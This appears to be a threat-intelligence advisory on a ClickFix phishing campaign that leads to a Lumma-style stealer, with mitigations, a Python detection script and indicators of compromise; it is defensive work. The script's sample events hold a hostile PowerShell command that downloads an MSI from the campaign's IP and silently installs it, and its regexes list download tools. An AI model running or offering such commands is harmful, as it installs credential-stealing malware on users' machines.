User interaction with a ClickFix-style phishing site resulted in execution of an obfuscated PowerShell command
A ClickFix-style phishing campaign tricks users into running an obfuscated PowerShell command that downloads and installs a malicious MSI package. The infection chain then relies on DLL sideloading: a renamed legitimate executable is placed next to a malicious DLL so that the trusted binary loads it. That stage runs HijackLoader, which delivers a Lumma-style information stealer as the final payload to harvest credentials and exfiltrate data. The campaign is described as using multiple command-and-control domains and IP addresses; the indicators below list one domain (robinhuds.com) and one IP (85.11.161.198). Mitigation consists of blocking the known indicators, training users to recognise this phishing tactic, detecting suspicious PowerShell execution and DLL sideloading, and isolating affected systems for remediation.
AI Analysis
Technical Summary
This is a multi-stage phishing attack that uses social engineering to make the victim execute an obfuscated PowerShell command. The command downloads a malicious MSI from attacker infrastructure (the listed URL is served from 85.11.161.198 on port 6600) and installs it. The installed components use DLL sideloading: a legitimate executable is renamed and dropped alongside a malicious DLL carrying the name of a library the executable imports, so the malicious code runs inside a trusted process and sidesteps controls that whitelist the host binary. The final stage runs HijackLoader, which delivers a Lumma-style information stealer built to harvest credentials and exfiltrate sensitive data. The campaign infrastructure described includes command-and-control domains and IP addresses such as robinhuds.com and 85.11.161.198; the published indicators are file hashes, a domain, an IP and two URLs. No patch or fix applies, since the chain exploits user interaction rather than a software vulnerability; the control points are the user-pasted PowerShell command, the remote MSI fetch and the sideloaded DLL.
Potential Impact
Successful execution installs malware capable of credential theft and data exfiltration. Because the loader runs through a renamed, trusted executable, the malicious DLL executes under a legitimate-looking parent, which lowers its detection footprint and raises the risk of a persistent compromise. Stolen credentials enable further unauthorised access and lateral movement within the affected environment, and any credentials exposed on an infected host should be treated as compromised. The use of several C2 domains and IPs means blocking the published indicators alone will not stop the campaign.
Mitigation Recommendations
No official patch is applicable since this is a social engineering and malware infection campaign. Block the listed IP, domain, URLs and file hashes at the DNS, proxy and EDR layers, treating hash blocks as the weakest control because the loader and DLL are trivially recompiled. Train users to recognise ClickFix-style lures: a web page that asks you to open the Run dialog or a terminal and paste a command it has placed on your clipboard is never a legitimate fix. Use EDR and PowerShell script block logging to alert on PowerShell launched with hidden-window, -NoProfile, -ExecutionPolicy Bypass or -EncodedCommand flags that fetches content from bare IP:port URLs, and on msiexec installing a package that was just downloaded. For the sideloading stage, alert on image loads where the process's on-disk name differs from its PE OriginalFileName and it loads an unsigned DLL from a user-writable directory. Isolate and remediate compromised hosts promptly, and reset credentials that were present on them, since credential theft is the campaign's objective.
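The two detections recommended above, written out as an added example (not code from the pulse or its author): it scores Sysmon-shaped process-create and image-load events for the ClickFix download stage and for DLL sideloading via a renamed binary. The events, field names (Image, CommandLine, OriginalFileName, ImageLoaded, Signed) and the list of user-writable directories are constructed assumptions; the host indicators are the ones published on this page.

```python
"""Detection logic for the two behaviours described above, run over
constructed Sysmon-shaped events (added example, not code from the pulse)."""
import base64
import ntpath
import re
from urllib.parse import urlparse

# Network indicators taken from the IOC list on this page.
KNOWN_BAD_HOSTS = {"robinhuds.com", "85.11.161.198"}

# PowerShell -EncodedCommand takes base64 of UTF-16LE text; this sample payload is constructed.
_ENC = base64.b64encode("IEX (New-Object Net.WebClient)".encode("utf-16-le")).decode()

# Constructed events using Sysmon field names: EventID 1 = process create, 7 = image load.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -w hidden -nop -c \"iwr http://85.11.161.198:6600/qffww8ph/2DTYOKUEN.msi "
                    "-OutFile $env:TEMP\\u.msi; msiexec /i $env:TEMP\\u.msi /qn\""},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": f"powershell -ep bypass -enc {_ENC}"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -c \"Get-ChildItem C:\\Logs | Measure-Object\""},
    {"EventID": 7, "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe",
     "OriginalFileName": "setup.exe",
     "ImageLoaded": "C:\\Users\\alice\\AppData\\Local\\Temp\\version.dll", "Signed": "false"},
    {"EventID": 7, "Image": "C:\\Program Files\\Vendor\\app.exe", "OriginalFileName": "app.exe",
     "ImageLoaded": "C:\\Windows\\System32\\version.dll", "Signed": "true"},
]

URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)
ENC_RE = re.compile(r"-(?:e|en|enc|ec|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
STEALTH_RE = re.compile(
    r"-(?:w|win|windowstyle)\s+hidden|-nop\b|-noprofile\b|-(?:ep|executionpolicy)\s+bypass", re.I)
DOWNLOAD_RE = re.compile(
    r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|curl|wget|start-bitstransfer)\b",
    re.I)
# Assumed list of directories an ordinary user can write to; a DLL loaded from
# one of these by a renamed binary is the sideloading signal.
USER_WRITABLE_RE = re.compile(r"^[a-z]:\\(?:users|programdata|windows\\temp|windows\\tasks)\\", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def check_powershell(event):
    """Reasons a process-create event looks like a ClickFix download-and-install stage."""
    reasons = []
    cmd = event["CommandLine"]
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command decodes to: " + decoded)
        cmd = cmd + " " + decoded  # inspect the decoded text with the same rules
    if STEALTH_RE.search(cmd):
        reasons.append("hidden-window / no-profile / policy-bypass flags")
    for url in URL_RE.findall(cmd):
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        if host in KNOWN_BAD_HOSTS:
            reasons.append("known campaign host " + host)
        if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host) and parsed.port:
            reasons.append("download from bare IP:port")
        if parsed.path.lower().endswith(".msi"):
            reasons.append("remote MSI package")
    if DOWNLOAD_RE.search(cmd) and re.search(r"\bmsiexec\b", cmd, re.I):
        reasons.append("download followed by msiexec install")
    return reasons


def check_image_load(event):
    """Reasons an image-load event looks like DLL sideloading through a renamed binary."""
    reasons = []
    on_disk = ntpath.basename(event["Image"]).lower()
    pe_name = event.get("OriginalFileName", "").lower()
    if pe_name and pe_name != on_disk:
        reasons.append(f"renamed binary: on-disk {on_disk}, PE OriginalFileName {pe_name}")
    dll = event["ImageLoaded"]
    if USER_WRITABLE_RE.match(dll):
        reasons.append("DLL loaded from user-writable path " + dll)
    if event.get("Signed", "").lower() != "true":
        reasons.append("unsigned DLL")
    return reasons


def analyse(events, min_reasons=2):
    """Alert on events with at least min_reasons signals; one weak signal alone
    (a hidden window, a single unsigned DLL) is too common in benign software."""
    alerts = []
    for i, ev in enumerate(events):
        reasons = check_powershell(ev) if ev["EventID"] == 1 else check_image_load(ev)
        if len(reasons) >= min_reasons:
            alerts.append({"index": i, "EventID": ev["EventID"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_EVENTS):
        print(f"event {alert['index']} (ID {alert['EventID']}):")
        for r in alert["reasons"]:
            print("   -", r)
```

Run stand-alone, the script flags the two PowerShell download events and the renamed-binary DLL load, and leaves the benign Get-ChildItem command and the properly signed System32 load alone. Decoding -EncodedCommand before matching matters: the first event is caught on its plain-text URL, but an attacker who base64-encodes the same command would otherwise slip past every string rule.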
Indicators of Compromise
Hash algorithms below are inferred from digest length (64 hex = SHA-256, 40 = SHA-1, 32 = MD5); the source labels them only as "hash".
- ip: 85.11.161.198
- domain: robinhuds.com
- url: http://robinhuds.com:9658/
- url: http://85.11.161.198:6600/qffww8ph/2DTYOKUEN.msi (MSI download)
- sha256: f31a8953531ffb5c14e2d8347e283e1f8f3c732a5a9a68f611c96f4730e8a7dc
- sha256: c529217014b732abbe646046c07ce8f0366a42051839d4cb3be5b400285fc728
- sha256: 818daf975f78ac30ba4ce0fdd2f7eb550cdc16701da35594e8c9cba72bc84a5c
- sha1: 10dfd71cf61ea3c1621a5b0c08c3b034773fb84b
- sha1: 7450731c0baf5befb79966a6be7873a5b1a62a7a
- sha1: b374d1715148bc80394b844d9f008adfa5585d65
- md5: b07a03883675654088a2b56a80933ca8
- md5: b6a201726b44106a7dbe93a480b38420
- md5: fa1f2ac9172702ad10c24f0a637c26cd
Technical Details
- Author: AlienVault
- TLP: white
- References: none listed
- Adversary: not attributed
- Pulse ID: 69f1de85544538ce8b03332a
- Threat Score: not assigned
Threat ID: 69f1e2aacbff5d8610f7a27f
Added to database: 4/29/2026, 10:51:22 AM
Last enriched: 4/29/2026, 11:08:12 AM
Last updated: 4/29/2026, 8:56:25 PM